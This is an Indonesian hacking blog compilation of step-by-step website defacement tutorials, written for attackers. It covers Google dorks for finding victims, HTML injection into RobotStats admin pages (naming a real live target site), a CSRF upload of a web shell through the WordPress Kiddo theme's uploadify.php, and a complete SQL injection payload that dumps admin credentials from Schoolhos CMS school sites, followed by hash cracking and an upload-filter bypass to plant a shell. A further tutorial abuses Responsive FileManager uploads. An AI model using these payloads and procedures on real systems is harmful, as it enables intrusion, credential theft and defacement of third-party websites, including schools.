Deface Teknik. Robot Stats HTML Injection

 

Baiklah para penebas website orang dan para pencari poc deface kali ini saya ingin menjelaskan tentang salah satu teknik deface yaitu HTML Injection untuk detail nya :

Platform CMS : RobotStats 1.0

Vulnerability : HTML Injection

Tools : Amplast Buat Coli

Syarat : Sebelum Mulai silahkan coli dulu pake amplast wkwkwkwkwk

Dork : inurl:"/robotstats/admin/robots.php"dan inurl:"admin/robots.php" selanjut nya lu gunakan imajinasi cabul kalian buat ngembangin dorknya

ok langsung saja

pertama dorking dulu sambil coli pake amplas :v dan akhir nya nemu juga ne live target nya http://alpesoiseaux.free.fr

oke pertama buka 

http://situs.co.li/path-cms/admin/robots.php

contoh :http://alpesoiseaux.free.fr/robotstats/admin/robots.php

kalo vuln atau yang CMS RobotStats akan terlihat seperti gambar dibawah ini

selanjutnya pilih Modifier maka akan muncul seperti gambar dibawah ini.

kemudian pada bagian kolom yang paling atas isi dengan script HTML Injection nya 

<font color=red size=8><body bgcolor=black>KALIMAT LU<img src=URL GAMBAR LU />

contoh : 

<font color=red size=8><body bgcolor=black>Injected by  MR.R.S<img src=http://data.whicdn.com/images/99814598/large.jpg />

kamudian letakkan script ini di form/kolom yang paling atas yang lainnya biarin aja default kemudian klik ok sesuai dengan gambar dibawah ini

dan jika berhasil maka akan muncul seperti gambar  dibawah ini

 

kemudian klik Retour à l'administration des robots. atau akses aja 

situs.co.li/path-cms/admin/robots.php

contoh :http://alpesoiseaux.free.fr/robotstats/admin/robots.php

.

Eh btw nih bisa masuk mirror lohh.. (y).

Sumber: garudasecurity.blogspot.com

Deface WordPress Theme Kiddo Uploadify

Berbicara Tentang Celah Keamanan Website, WordPress lah yang paling banyak mewarnainya :v

Entah dari sisi Tema, Plugin, dan lain-lain.

artikel tutorial "Deface WordPress Theme Kiddo Uploadify" memang termasuk bug lama, tapi ketika saya coba exploit target dengan hanya 1x pilih ternyata langsung vuln :o (Hokinya seorang jomblo)

Ok simak deh tutorialnya.

Bahan-Bahan.

1. Dork :

inurl:"/wp-content/themes/kiddo/"

2. Exploit :/app/assets/js/uploadify/uploadify.php

3. CSRF. karena CSRF kami sering berpindah url jadi maklumin saja namanya juga CP orang :v

jadi saya kasih CSRF biasa aja ya.

Pastebin - CSRF WordPress Theme Kiddo Uploadify

tenang aja ntar di kasih tau cara pakainya

4. Pacar kalo kaga punya jangan di paksain :'( (I'm fine !!)

Step by Step :

1. Dorking dulu di gugel pakai dork di atas (terserah dorking biasa atau gambar)

2. Pilih target yang kamu anggap cocok untuk di ambil keperawanannya.

3. Masukan Exploit (klo bingung liat gambar)

Yang Di Kotak Merah adalah target yang sudah di exploit

4. Vuln ?? Seperti biasa Uploadify rata2 blank

5. Copy/Download CSRF di atas save dengan format html contoh : csrf.html !! buka/edit di notepad.

6. Ganti di bagian url nya dengan url target kamu yang vuln setelah di exploit

Yang di kotak merah ganti dengan target kamu

7. Setelah itu save formatnya tetap html, lalu buka CSRF nya (buka dengan browser, Mozilla atau Chrome)

8. Klik browse lalu pilih file kamu lalu klik ambil perawan

9. Jika file selesai/sukses di upload hasilnya seperti ini. (lihat gambar)

Note : kaga mesti nama sih, bisa jadi cuma muncul anggka 1

10. Access shell :http://target.co.li/namafile.php

Selesai :) Mohon maaf ya CSRF online nya lagi dalam perbaikan -_-

Sampai sini dulu jumpa kita. :D 

Jangan bosan bosan kunjungi blog ini yaa.. :) 

Deface SQLi Schoolhos CMS

Lagi lagi CMS yang banyak di gunakan website sekolah memiliki BUG, setelah Balitbang, Popoji CMS.. Nanti apa lagi yah ?? Kali ini bukan tentang Baltibang atau Popoji CMS melainkan "Schoolhos CMS" mungkin CMS ini belum sempurna makanya masih memiliki BUG yang Cukup beresiko !! simak langsung aja tutorial "Deface SQLi Schoolhos CMS"

Bahan-bahan :

1. Dork :

# inurl:"/?p=info" site:id

# inurl:"/?p=detberita"

# inurl:"/?p=guru" site:id

kembangkan lagi dengan otak hentai kalian :v

2. SQL Injection (Exploit SQL)

' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 Hash Decrypter :https://hashkiller.co.uk/

Step by Step :

1. Dorking di gugel (jangan dorking gambar coeg)

2. Pilih target kamu

3. Masukan Exploit (SQL Injection) contoh : http://targetkamu.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

4. Kalo vuln akan muncul username dan password nya.

Note : itukan setelah admin ada angka-angka contoh : admin20160407 nah si angka 20160407 abaikan aja.

5. Copy MD5 Hash tadi, lalu kamu buka MD5 Decrypter tadi. kamu masukan di situ. hash yang tadi.

6. Setelah selesai di hash kamu login ke panel admin. lokasinya : http://targetkamu.domain/adminpanel/

7. Masukan username dan password yang kamu dapat tadi..

8. Lanjut !! mau tanam shell ?? kamu tinggal ke menu Berita, Informasi, Album Galeri.

9. Rename dlu shell kamu dari shell.php jadi shell.php.jpg

10. Setelah itu pilih shell kamu lalu gunakan tamper data..

11. Ganti nama shell kamu dari shell.php.jpg jadi shell.php (ganti pas di tamper datanya)

Note : tanam shell dan akses shell nya sama kaya Lokomedia kok.

Warning ! : Karena yang menggunakan CMS ini adalah web sekolah.. saya mohon jangan terlalu berlebihan mengexploitnya. Dan jangan juga tebas index malu om sama total archive defacean kamu.

Apalagi bawa-bawa nama Indonesia dan blabla. Pengen tenar ?? kaga usah show off defacean web sekolah.. kalo gw liat sih bakal gw ketawain.

Mengenali Dork Google Dan belajar mengembangkannya

Hmm, pasti kata google dork sudah tidak asing lagi bagi kalian kan? tp apakah kalian tau arti dari dork google ??. kali ini saya ada materi tentang "Mengenali Dork Google dan Belajar Cara Mengembangkannya". Simak aja baik baik :)

Arti Dari Google Dork :

Dork adalah semua susunan kata kunci yang di gunakan untuk mencari infomasi di google dengan lebih efektif dan lebih terkhususkan (itu menurut saya).

Fungsi Dork Google :

Fungsi nya adalah mencari sumber informasi lebih detail dan terperinci, kalian bisa mengetahui letak login admin website, bug sebuah website, bahkan kalian bisa mengetahui password/username admin sebuah website, namun jangan harap kalian bisa melakukan itu semua kalau kalian tidak bisa mengebangka dork

Cara Mengembangkannya :

Kalian harus menggunakan logika kalian untuk membuat/mengembakan dork, misalnya kalian mencari tempat upload file (bug untuk menyerang) kalian harus mencari url, title, text yang berkaitan dengan upload file.

Kata Kunci Dasar Dork :

mungkin yang kalian tau hanyalah intitle, inurl, intext -_- sebenarnya masih ada lagi selain itu..

1. Intitle : untuk mencari judul dari sebuah laman

2. Intext : untuk mencari sebuah text yang terdapat pada laman

3. Inurl : untuk mencari url yang berkaitan dengan sebuah halaman

4. Site : untuk mencari sebuah site, jika di gunakan site:.domainnegara maka itu untuk mencari domain (kalian bisa googling nama-nama domain negara) jika di gunakansite:www.target.com dan di kombinasikan dengan inurl tau intitle itu lebih terkhusus kan pada website yg di tuju

5. Ext : untuk mencari extensi url sepeti, .php .html .asp dan lain-lain

6. Cache : akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler

7. Penggunaan tanda "dork"  (2kutip) : fungsi nya untuk menggunci dork agar lebih berurutan sesuai dork yg di dari

Sekian dulu tutorial kali ini semoga bermanfaat, jika banyak salah/kurangnya mohon maaf saya juga hanya newbie yang fakir ilmu :( dan jangan lupa sering seringlah berkunjung di blog ini. :D 

#tinggalkan Jejak di Komentar.. :D

Deface Dengan phUploader Vulnerbility File Upload

Biasa,, lagi iseng iseng dorking nemu file terus ane klik,, ternyata semacam file manager lebih tepatnya : "Responsive FileManager" file manager nya juga udah kaga asing bagi ane.. ane pernah liat saat exploiting Popoji CMS (web sekolah sendiri, sebelum exploit itu tenar dimana2). eh ternyata ane keduluan sama E7B_404 , yang lebih dlu tau exploit ini, terus ane kembangin lagi dorknya aja... ok deh simak aja Tutorialnya.. "Deface Dengan Responsive FileManager"

Bahan-Bahan :

Dork :

1. inurl:/filemanager/ intext:"dialog.php"
2. inurl:/js/filemanager/ intext:"dialog.php"
3. inurl:/assets/filemanager/ intext:"dialog.php"

Exploit (File yang terinfeksi/bisa di exploit) :

dialog.php

example :www.targetsuka.co.li/filemanager/dialog.php

Script Pepes

klo belum punya bikin atau colong punya orang

Step by Step :

1. Seperti biasa,, dorking adalah hal wajib.. dorking di gugel pake dork di atas (saya pakai dork no.1)

2. Pilih target nyaa..

Klik dialog.php

3. Setelah klik dialog.php kalian akan beralih ke Responsive FileManager

4. Cari aja tombol upload di pojok atas kiri (biasanya di situ)

Klik aja.

5. Setelah itu kalian klik lalu pilih script deface kalian

6. Jika sukses hasilnya seperti ini..

Ada tanda ceklis berwarna hijau

7. Untuk aksesnya kalian.. kembali dlu ke awal Responsive FileManager nya (klik tombol hitam di atas) lupa gw tandain :v

8. Klik kanan pada file yang telah kalian upload tadi,, lalu pilih Show URL

9. Kalian Copy url nya terus paste di address bar browser kamu.. dan jrengg-jrengg..

10. Nitip nick boleh kali ?? MR.R.S

11. Nitip nama Garuda Security Hackerboleh kali ??

Ok sampai di sini dulu Cara deface phUploader Vulnerbility File Upload semogah bermanfaat :) Jangan bosan bosan kkunjungi BLOG ini ya.. :D

Sumber: GarudaSecurity.blogspot.com